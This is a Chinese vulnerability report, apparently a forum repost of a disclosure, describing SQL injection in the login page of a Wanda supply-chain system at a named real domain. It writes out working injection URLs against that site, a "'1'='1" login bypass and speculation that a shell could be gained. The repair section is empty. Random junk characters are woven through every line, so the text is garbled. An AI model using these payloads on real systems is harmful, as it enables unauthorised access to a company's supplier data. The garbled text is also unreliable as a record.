简要描述:万达某分站sql注入。敏感信息泄露。
- `7 T& F# @ R4 y4 P) J3 `- s# i详细说明:: W. y; a4 y. P- ?; ?
万达scm系统登陆框sql注入。* l0 P( n/ {' Y
# u3 Z$ H) R1 G
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%275 m8 ^0 {/ H, x0 Q6 [- ?
. B( O5 T+ _9 N
3 ?( V' p' j+ J7 E/ U% i
500错误。# Z% z% \; B! P; ]; F. ]
( W. ~! f u& E1 G3 q
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。3 y8 ~- A! l" ^) F0 B
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
- n- C5 M0 z( a8 u# {! N截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)) W) v% Z( {, F3 h% h" C% m
经过分析,登陆验证的过程应该是:6 o: T+ `2 n ]$ z( x& J
4 Q6 @. K/ H, D; X" i1 o
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
, I; l ?# t' Y2 Ghttp://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png* |8 h j. S1 w) Q1 M* T6 g1 r
i' G8 t+ f8 N9 M3 _ v
oracle数据库,存在注入点。@大连万达,你怎么看? U/ l$ a, @- n1 e
http://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png, W1 [6 B6 O' c( q5 J+ E
- u' }0 r+ C2 y5 x系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。( G% B8 @3 Q8 W. \7 ?* O
漏洞证明:! h+ v, s0 ~8 }% l
万达scm系统登陆框sql注入。
5 D6 P8 h' J: K, A6 O0 w' t7 q6 O: w
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
5 T9 c0 {9 Z# X! B
! n$ X: a0 [3 \; w- W O" x. V
% ^( _/ w2 s2 f8 _8 ?/ W: x* u+ `500错误。8 {+ p8 G$ D8 s. ~4 L
8 O: c& q/ j- z" p; i7 o
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
1 ?- F: H- m v5 E) N& E) Chttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png
/ c" V8 H0 Q* j, w4 K, F2 c* A
; w. R9 x p5 }+ {0 R" a" ]- c; n* V6 N. {
(截图有一点问题)
# k+ a5 y1 r/ D! s5 p& p: X( V& K% b) U9 N! ^
怎么饶都饶不过去;经过分析,登陆验证的过程应该是:
, d1 K z# v+ u, g
$ G5 \' a9 @- u- q# l) P取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。( x, S2 W, S4 W! R
* q8 J9 X0 p8 E" W6 l- y
绕过:+ O7 L- C) N# o M2 A& T4 I
http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1
5 M! k# H: J. b7 X! T, O6 I% Q9 N5 S! u/ ?4 g& ]% I2 T' T) e
3 C. {3 q, Q) ]# E5 L1 ^! n5 z
oracle数据库,存在注入点。@大连万达,你怎么看?2 A0 A' p N+ h# G+ }2 G7 [. \& L
系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。" \& s( l. J2 Y) w
0 N+ U2 A( \* e) f. W1 K# A修复方案:
x9 H' X+ }3 `。。。
9 h. f/ o3 e* R1 G: h, M. A8 ^4 a4 B3 T( u: m3 I( `$ ?/ t9 x
$ g: e. a( {0 t& y: c厂商已经确认2 f2 [2 t' _) ~- \# T' o8 y
0 ?) _$ x) S7 b, g- [$ T: k' k[/td][/tr]
8 W! ^# o" n3 Z' _' S7 u[/table]
2 T- o) _! p; T6 }2 s# v+ z
2 ~7 B$ f n" L' q3 Z0 c# j! V }0 {1 h @3 e4 L
|